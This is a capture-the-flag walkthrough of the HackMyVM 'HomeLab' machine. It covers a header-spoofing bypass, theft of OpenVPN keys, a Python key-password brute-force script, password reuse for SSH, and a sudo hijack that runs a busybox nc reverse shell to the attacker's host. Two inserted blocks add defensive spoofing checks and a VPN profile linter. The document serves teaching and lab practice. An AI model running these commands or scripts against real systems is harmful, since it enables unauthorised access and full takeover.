HackMyVM-HomeLab-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.202 08:00:27:4c:a5:70 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f3:7c:e9 VMware, Inc.

16 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.065 seconds (123.97 hosts/sec). 4 responded
export ip=192.168.60.202
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.202:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 08:49 CST
Initiating ARP Ping Scan at 08:49
Scanning 192.168.60.202 [1 port]
Completed ARP Ping Scan at 08:49, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:49
Completed Parallel DNS resolution of 1 host. at 08:49, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:49
Scanning 192.168.60.202 [1 port]
Discovered open port 80/tcp on 192.168.60.202
Completed SYN Stealth Scan at 08:49, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.202
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-05-29 08:49:09 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:4C:A5:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Only port 80 is open.

Let's enumerate directories.

❯ dirsearch -u $ip

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/Pepster/hmv/reports/_192.168.60.202/_25-05-29_08-49-58.txt

Target: http://192.168.60.202/

[08:49:58] Starting:
[08:49:59] 403 - 277B - /.ht_wsr.txt
[08:49:59] 403 - 277B - /.htaccess.bak1
[08:49:59] 403 - 277B - /.htaccess.orig
[08:49:59] 403 - 277B - /.htaccess.sample
[08:49:59] 403 - 277B - /.htaccess.save
[08:49:59] 403 - 277B - /.htaccess_extra
[08:49:59] 403 - 277B - /.htaccess_sc
[08:49:59] 403 - 277B - /.htaccess_orig
[08:49:59] 403 - 277B - /.htaccessBAK
[08:49:59] 403 - 277B - /.htaccessOLD
[08:49:59] 403 - 277B - /.htaccessOLD2
[08:49:59] 403 - 277B - /.htm
[08:49:59] 403 - 277B - /.html
[08:49:59] 403 - 277B - /.htpasswd_test
[08:49:59] 403 - 277B - /.htpasswds
[08:49:59] 403 - 277B - /.httr-oauth
[08:50:07] 200 - 1KB - /cgi-bin/test-cgi
[08:50:07] 200 - 820B - /cgi-bin/printenv
[08:50:10] 200 - 4KB - /error.html
[08:50:11] 200 - 8KB - /favicon.ico
[08:50:21] 301 - 315B - /script -> http://192.168.60.202/script/
[08:50:21] 403 - 277B - /script/
[08:50:21] 403 - 277B - /server-status
[08:50:21] 403 - 277B - /server-status/
[08:50:21] 301 - 316B - /service -> http://192.168.60.202/service/
[08:50:21] 301 - 321B - /service?Wsdl -> http://192.168.60.202/service/?Wsdl
[08:50:23] 301 - 314B - /style -> http://192.168.60.202/style/

Opening it in a browser shows a Mac OS X Server page; the UI is very retro 🤣

The service page gives a hint:

❯ curl -s http://192.168.60.202/service/
Whoa! But sorry, this service is only available for myself!%

X-Forwarded-For Spoofing

I guessed that the page might require local access. Adding an X-Forwarded-For header with 127.0.0.1 did not work,

so I tried the target's own IP instead, and surprisingly the page responded.
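Why the check above is bypassable, written out as an added example that is not code from the original post or from the HomeLab box: the vulnerable version trusts whatever the client writes in X-Forwarded-For (which is what the page observes), the hardened version believes that header only when the TCP peer is a known reverse proxy, and a detector flags untrusted peers claiming a loopback or server address. `TRUSTED_PROXIES` is a constructed value.

```python
from ipaddress import ip_address

SERVER_SELF = "192.168.60.202"      # the target's own address, as seen on the page
TRUSTED_PROXIES = {"10.0.0.5"}      # constructed: the only hop allowed to set X-Forwarded-For
SELF_ADDRESSES = {SERVER_SELF}


def _first_hop(headers):
    # The left-most entry is whatever the original client wrote: attacker-controlled.
    return headers["X-Forwarded-For"].split(",")[0].strip()


def _is_self(addr):
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return ip.is_loopback or addr in SELF_ADDRESSES


def is_local_vulnerable(headers, remote_addr):
    """Reproduces the bypass: the header wins over the TCP peer address, and the
    page shows the server accepting its own address there (127.0.0.1 did not work)."""
    claimed = _first_hop(headers) if "X-Forwarded-For" in headers else remote_addr
    return claimed == SERVER_SELF


def is_local_hardened(headers, remote_addr):
    """Believe X-Forwarded-For only when the TCP peer is a known proxy, and then
    take the right-most entry, which is the address that proxy itself saw."""
    addr = remote_addr
    if remote_addr in TRUSTED_PROXIES and "X-Forwarded-For" in headers:
        addr = headers["X-Forwarded-For"].split(",")[-1].strip()
    return _is_self(addr)


def is_spoof_attempt(headers, remote_addr):
    """Detection rule for access logs: an untrusted peer presenting a header
    that claims a loopback or server-owned address."""
    if "X-Forwarded-For" not in headers or remote_addr in TRUSTED_PROXIES:
        return False
    return any(_is_self(h.strip()) for h in headers["X-Forwarded-For"].split(","))
```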

This yields what looks like an OpenVPN configuration file.

❯ curl -s "http://192.168.60.202/service/" -H "X-Forwarded-For:$ip"
# Last modified by shinosawa
# on 2024-12-21

# Example Configuration File

client
dev tun
proto udp
remote ? ?
resolv-retry infinite
nobind
persist-key
persist-tun
ca ?
cert ?
# Regenerate a STRONG password for the KEY
# Do NOT use a SAME password as other services et. SSH
# it is DANGEROUS!
key ?
cipher AES-256-GCM
verb 3

However, much of the information has been redacted and needs to be filled in by hand.

The ca, cert and key entries are missing,

and the certificate files use the .crt extension.

Let's add these as extensions and enumerate the directories again.

❯ feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt -x ca -x crt -x key

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.60.202
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, ca, crt, key]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 5l 27w 226c http://192.168.60.202/style/serverhome_static.css
200 GET 13l 37w 2194c http://192.168.60.202/poweredbymacosxserver.gif
200 GET 192l 384w 3041c http://192.168.60.202/style/iphone.css
200 GET 75l 215w 2241c http://192.168.60.202/script/serverhome.js
200 GET 412l 2178w 136171c http://192.168.60.202/script/compressed_libraries.js
200 GET 351l 1040w 98713c http://192.168.60.202/script/compressed_widgets.js
200 GET 130l 376w 5435c http://192.168.60.202/
301 GET 9l 28w 316c http://192.168.60.202/service => http://192.168.60.202/service/
301 GET 9l 28w 314c http://192.168.60.202/style => http://192.168.60.202/style/
301 GET 9l 28w 318c http://192.168.60.202/style/img => http://192.168.60.202/style/img/
200 GET 20l 22w 1200c http://192.168.60.202/service/ca.crt
200 GET 84l 139w 4492c http://192.168.60.202/service/client.crt
200 GET 30l 36w 1862c http://192.168.60.202/service/client.key
301 GET 9l 28w 315c http://192.168.60.202/script => http://192.168.60.202/script/
[>-------------------] - 9s 51500/5513815 17m found:14 errors:0
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_60_202-1748481040.state ...
[>-------------------] - 9s 51709/5513815 17m found:14 errors:0
[>-------------------] - 9s 14650/1102725 1600/s http://192.168.60.202/
[>-------------------] - 9s 11730/1102725 1337/s http://192.168.60.202/service/
[>-------------------] - 8s 9355/1102725 1195/s http://192.168.60.202/style/
[>-------------------] - 8s 9090/1102725 1179/s http://192.168.60.202/style/img/
[>-------------------] - 5s 6215/1102725 1242/s http://192.168.60.202/script/

Three new files are found: ca.crt, client.crt and client.key.

Download all of them locally.

❯ wget http://192.168.60.202/service/ca.crt
--2025-05-29 09:11:41-- http://192.168.60.202/service/ca.crt
Connecting to 192.168.60.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1200 (1.2K) [application/x-x509-ca-cert]
Saving to: ‘ca.crt’

ca.crt 100%[=======================================================================>] 1.17K --.-KB/s in 0s

2025-05-29 09:11:41 (479 MB/s) - ‘ca.crt’ saved [1200/1200]

❯ wget http://192.168.60.202/service/client.crt
--2025-05-29 09:11:49-- http://192.168.60.202/service/client.crt
Connecting to 192.168.60.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4492 (4.4K) [application/x-x509-ca-cert]
Saving to: ‘client.crt’

client.crt 100%[=======================================================================>] 4.39K --.-KB/s in 0s

2025-05-29 09:11:49 (1.06 GB/s) - ‘client.crt’ saved [4492/4492]

❯ wget http://192.168.60.202/service/client.key
--2025-05-29 09:11:53-- http://192.168.60.202/service/client.key
Connecting to 192.168.60.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1862 (1.8K)
Saving to: ‘client.key’

client.key 100%[=======================================================================>] 1.82K --.-KB/s in 0s

2025-05-29 09:11:53 (666 MB/s) - ‘client.key’ saved [1862/1862]

Put the .ovpn configuration file in the same directory as the private key file.

OpenVPN usually listens on UDP port 1194; check whether it is open on the target.

❯ nmap -sU -sV --version-intensity 0 -n  -T4 $ip -p1194
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 09:17 CST
Nmap scan report for 192.168.60.202
Host is up (0.00039s latency).

PORT STATE SERVICE VERSION
1194/udp open openvpn OpenVPN
MAC Address: 08:00:27:4C:A5:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

Edit the configuration file by hand.

❯ curl -s "http://192.168.60.202/service/" -H "X-Forwarded-For:$ip" -o homelab.ovpn
❯ vim homelab.ovpn
# Last modified by shinosawa
# on 2024-12-21

# Example Configuration File

client
dev tun
proto udp
remote 192.168.60.202 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
# Regenerate a STRONG password for the KEY
# Do NOT use the SAME password as other services, e.g. SSH
# It is DANGEROUS!
key client.key
cipher AES-256-GCM
verb 3
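The profile as edited above still lacks the settings that the OpenVPN client warns about when it connects (no server certificate verification, password caching), and the redacted copy served by the box still carries "?" placeholders. The following linter, an added example that is not code from the original post or the box, parses an OpenVPN client profile and flags those conditions; `HOMELAB_PROFILE` is the profile from this page embedded as a constructed sample.

```python
AEAD_CIPHERS = {"AES-256-GCM", "AES-128-GCM", "CHACHA20-POLY1305"}

# The profile as edited on the page, embedded as a constructed sample.
HOMELAB_PROFILE = """\
client
dev tun
proto udp
remote 192.168.60.202 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
cipher AES-256-GCM
verb 3
"""


def parse_ovpn(text):
    """Return [(directive, args)]; inline <ca>...</ca> blocks are skipped so
    their PEM lines are not read as directives."""
    entries, in_block = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if in_block:
            if line == f"</{in_block}>":
                in_block = None
            continue
        if line.startswith("<") and line.endswith(">"):
            in_block = line[1:-1]
            continue
        parts = line.split()
        entries.append((parts[0], parts[1:]))
    return entries


def lint_client_profile(text):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    entries = parse_ovpn(text)
    names = {d for d, _ in entries}
    full = {" ".join([d, *a]) for d, a in entries}
    findings = []
    if "remote-cert-tls server" not in full and "verify-x509-name" not in names:
        findings.append("no server certificate check: add 'remote-cert-tls server' "
                        "(this is the MITM warning in the connection log)")
    if "auth-nocache" not in names:
        findings.append("auth-nocache missing: the key password may stay cached in memory")
    if not names & {"tls-auth", "tls-crypt", "tls-crypt-v2"}:
        findings.append("no tls-auth/tls-crypt: the server will start a TLS handshake "
                        "with any client that reaches UDP 1194")
    for d, a in entries:
        if "?" in a:
            findings.append(f"'{d}' still carries a '?' placeholder")
        elif d in ("ca", "cert", "key", "remote") and not a:
            findings.append(f"'{d}' has no argument")
        elif d == "remote" and len(a) == 1:
            findings.append("remote has no port (OpenVPN defaults to 1194)")
        elif d == "cipher" and a and a[0].upper() not in AEAD_CIPHERS:
            findings.append(f"non-AEAD cipher {a[0]}")
    return findings
```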

Private Key Decryption

Let's try connecting with openvpn.

As expected, client.key prompts for a password.

sudo openvpn homelab.ovpn
[sudo] password for Pepster:
2025-05-29 09:19:41 Note: Kernel support for ovpn-dco missing, disabling data channel offload.
2025-05-29 09:19:41 WARNING: file 'client.key' is group or others accessible
2025-05-29 09:19:41 OpenVPN 2.6.12 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-05-29 09:19:41 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-05-29 09:19:41 DCO version: N/A
2025-05-29 09:19:41 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Enter Private Key Password: (press TAB for no echo)

The only option left is brute force, using the -passin pass: argument to pass the password on the command line.

Author 20206675 likes to use the xato-net-10-million-passwords-100000.txt wordlist,

which is a bit faster.

The Python script is as follows:

import subprocess
import os

# Configuration
encrypted_key_path = "client.key"
decrypted_key_path = "client_decrypted.key"
password_list_path = "/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt"

print(f"Attempting to decrypt {encrypted_key_path} using passwords from {password_list_path}")

try:
    # errors="ignore" keeps a stray non-UTF-8 byte in the wordlist from aborting the run
    with open(password_list_path, 'r', encoding='utf-8', errors='ignore') as f:
        for line_num, password in enumerate(f, 1):
            password = password.strip()  # Remove leading/trailing whitespace including newline
            if not password:
                continue  # Skip empty lines

            print(f"Trying password {line_num}: '{password}'")

            # Construct the openssl command
            # -passin pass:PASSWORD is used for direct password input
            # subprocess.run is preferred over os.system or simple backticks for better control
            cmd = [
                "openssl", "rsa",
                "-in", encrypted_key_path,
                "-out", decrypted_key_path,
                "-passin", f"pass:{password}"  # Direct password input
            ]

            # Execute the command
            # capture_output=True captures stdout and stderr
            # text=True decodes stdout/stderr as text
            # check=False prevents subprocess.run from raising an exception on non-zero exit codes
            process = subprocess.run(cmd, capture_output=True, text=True, check=False)

            # Check if decryption was successful based on stdout/stderr
            # OpenSSL writes "writing RSA key" to stderr on success
            # Or you can check the exit code directly
            if process.returncode == 0 and "writing RSA key" in process.stderr:
                print(f"\n[SUCCESS] Found password: '{password}'")
                print(f"Decrypted key saved to {decrypted_key_path}")
                break  # Stop the loop on success
            elif ("bad decrypt" in process.stderr
                  or "digital envelope routines" in process.stderr
                  or "pkcs12 cipherfinal error" in process.stderr):
                # Incorrect password (common errors)
                pass  # Just continue to the next password
            else:
                # Other potential errors (e.g., file not found, malformed key)
                print(f"[ERROR] Openssl output for '{password}':")
                print(process.stdout)
                print(process.stderr)
                # You might want to break here if it indicates a critical issue,
                # or continue if it's a transient error.
                # For this specific case, continue if it's not a success and not a common "bad password" error.

except FileNotFoundError:
    print(f"Error: Password list file not found at {password_list_path}")
except Exception as e:
    print(f"An unexpected error occurred: {e}")

finally:
    # Clean up the partially decrypted file if it was created on incorrect password
    # openssl will write a zero-byte file if decryption fails
    if os.path.exists(decrypted_key_path) and os.path.getsize(decrypted_key_path) == 0:
        os.remove(decrypted_key_path)
        print("Removed empty decrypted key file.")

Run it:

❯ python3 brute.py
…………………………
Trying password 23601: 'hiro'

[SUCCESS] Found password: 'hiro'
Decrypted key saved to client_decrypted.key

You can either enter the password when connecting, or change the key entry in the .ovpn configuration file to client_decrypted.key.

sudo openvpn homelab.ovpn
[sudo] password for Pepster:
2025-05-29 09:35:58 Note: Kernel support for ovpn-dco missing, disabling data channel offload.
2025-05-29 09:35:58 WARNING: file 'client.key' is group or others accessible
2025-05-29 09:35:58 OpenVPN 2.6.12 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-05-29 09:35:58 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-05-29 09:35:58 DCO version: N/A
2025-05-29 09:35:58 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Enter Private Key Password: ••••
2025-05-29 09:36:03 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2025-05-29 09:36:03 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.60.202:1194
2025-05-29 09:36:03 Socket Buffers: R=[212992->212992] S=[212992->212992]
2025-05-29 09:36:03 UDPv4 link local: (not bound)
2025-05-29 09:36:03 UDPv4 link remote: [AF_INET]192.168.60.202:1194
2025-05-29 09:36:03 TLS: Initial packet from [AF_INET]192.168.60.202:1194, sid=66448eaa 15bfc094
2025-05-29 09:36:03 VERIFY OK: depth=1, CN=My-Home CA
2025-05-29 09:36:03 VERIFY OK: depth=0, CN=server
2025-05-29 09:36:03 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X25519
2025-05-29 09:36:03 [server] Peer Connection Initiated with [AF_INET]192.168.60.202:1194
2025-05-29 09:36:03 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1
2025-05-29 09:36:03 TLS: tls_multi_process: initial untrusted session promoted to trusted
2025-05-29 09:36:03 PUSH: Received control message: 'PUSH_REPLY,route 10.176.13.0 255.255.255.0,dhcp-option DNS 8.8.8.8,route-gateway 10.8.0.1,topology subnet,ping 10,ping-restart 120,ifconfig 10.8.0.2 255.255.255.0,peer-id 0,cipher AES-256-GCM,protocol-flags cc-exit tls-ekm dyn-tls-crypt,tun-mtu 1500'
2025-05-29 09:36:03 OPTIONS IMPORT: --ifconfig/up options modified
2025-05-29 09:36:03 OPTIONS IMPORT: route options modified
2025-05-29 09:36:03 OPTIONS IMPORT: route-related options modified
2025-05-29 09:36:03 OPTIONS IMPORT: --ip-win32 and/or --dhcp-option options modified
2025-05-29 09:36:03 OPTIONS IMPORT: tun-mtu set to 1500
2025-05-29 09:36:03 net_route_v4_best_gw query: dst 0.0.0.0
2025-05-29 09:36:03 net_route_v4_best_gw result: via 192.168.60.2 dev eth0
2025-05-29 09:36:03 ROUTE_GATEWAY 192.168.60.2/255.255.255.0 IFACE=eth0 HWADDR=5e:bb:f6:9e:ee:fa
2025-05-29 09:36:03 TUN/TAP device tun0 opened
2025-05-29 09:36:03 net_iface_mtu_set: mtu 1500 for tun0
2025-05-29 09:36:03 net_iface_up: set tun0 up
2025-05-29 09:36:03 net_addr_v4_add: 10.8.0.2/24 dev tun0
2025-05-29 09:36:03 net_route_v4_add: 10.176.13.0/24 via 10.8.0.1 dev [NULL] table 0 metric -1
2025-05-29 09:36:03 Initialization Sequence Completed
2025-05-29 09:36:03 Data Channel: cipher 'AES-256-GCM', peer-id: 0
2025-05-29 09:36:03 Timers: ping 10, ping-restart 120
2025-05-29 09:36:03 Protocol options: protocol-flags cc-exit tls-ekm dyn-tls-crypt

The TUN tunnel is established.

Checking with ip, there is now a tun0 virtual interface with the address 10.8.0.2.

❯ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 5e:bb:f6:9e:ee:fa brd ff:ff:ff:ff:ff:ff
inet 192.168.60.100/24 brd 192.168.60.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fd15:4ba5:5a2b:1008::100/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::5cbb:f6ff:fe9e:eefa/64 scope link
valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.8.0.2/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::2fe5:b231:cfd2:ebd2/64 scope link stable-privacy
valid_lft forever preferred_lft forever

Let's scan all IPs in this subnet.

Only 10.8.0.1 is there, and this IP is probably the gateway.

❯ fscan -h 10.8.0.1/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.8.0.0-10.8.0.255
[*] 已生成IP范围: 10.8.0.0 - 10.8.0.255
[*] 已解析CIDR 10.8.0.1/24 -> IP范围 10.8.0.0-10.8.0.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 10.8.0.2 存活 (ICMP)
[+] 目标 10.8.0.1 存活 (ICMP)
[+] ICMP存活主机数量: 2
[*] 共解析 218 个有效端口
[+] 端口开放 10.8.0.2:80
[+] 端口开放 10.8.0.1:80
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://10.8.0.2 状态码:200 长度:2891 标题:Index of /
[*] 网站标题 http://10.8.0.1 状态码:200 长度:5435 标题:Mac OS X Server
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 6.729460238s

Check the routing table.

❯ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.60.2 0.0.0.0 UG 0 0 0 eth0
10.8.0.0 0.0.0.0 255.255.255.0 U 0 0 0 tun0
10.176.13.0 10.8.0.1 255.255.255.0 UG 0 0 0 tun0
192.168.60.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0

This shows that traffic to the 10.176.13.0 subnet goes through the 10.8.0.1 gateway.

You can also see this from the OpenVPN connection log:

2025-05-29 09:36:03 net_addr_v4_add: 10.8.0.2/24 dev tun0
2025-05-29 09:36:03 net_route_v4_add: 10.176.13.0/24 via 10.8.0.1 dev [NULL] table 0 metric -1
2025-05-29 09:36:03 Initialization Sequence Completed
2025-05-29 09:36:03 Data Channel: cipher 'AES-256-GCM', peer-id: 0
2025-05-29 09:36:03 Timers: ping 10, ping-restart 120
2025-05-29 09:36:03 Protocol options: protocol-flags cc-exit tls-ekm dyn-tls-crypt

Scan this subnet next.

10.176.13.37 is alive and has port 22 open.

❯ fscan -h 10.176.13.0/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.176.13.0-10.176.13.255
[*] 已生成IP范围: 10.176.13.0 - 10.176.13.255
[*] 已解析CIDR 10.176.13.0/24 -> IP范围 10.176.13.0-10.176.13.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 10.176.13.37 存活 (ICMP)
[+] ICMP存活主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 10.176.13.37:80
[+] 端口开放 10.176.13.37:22
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://10.176.13.37 状态码:200 长度:5435 标题:Mac OS X Server
[!] 扫描错误 10.176.13.37:22 - ssh: handshake failed: EOF
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 8.825740272s

User Privilege Escalation

From the comments in the .ovpn configuration file above, the SSH password is probably also a weak one.

Let's guess that the password is reused.

❯ ssh shinosawa@10.176.13.37
shinosawa@10.176.13.37's password:

homelab:~$ cat user.flag
flag{38665d1048af82499c6ecbd3c0db3acc}
homelab:~$ sudo -l
Matching Defaults entries for shinosawa on homelab:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for shinosawa:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User shinosawa may run the following commands on homelab:
(ALL) NOPASSWD: /home/shinosawa/deepseek

Root Privilege Escalation

The user has sudo rights to run a program located in their own home directory.

Since it lives in the home directory, just delete it and create a new one in its place.

homelab:~$ rm deepseek
rm: remove 'deepseek'? y
homelab:~$ echo "busybox nc 192.168.60.100 4444 -e /bin/ash">deepseek
homelab:~$ chmod +x deepseek
homelab:~$ sudo /home/shinosawa/deepseek
---------------------------
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100 • 10.8.0.2
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from homelab.hmv-192.168.60.202-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
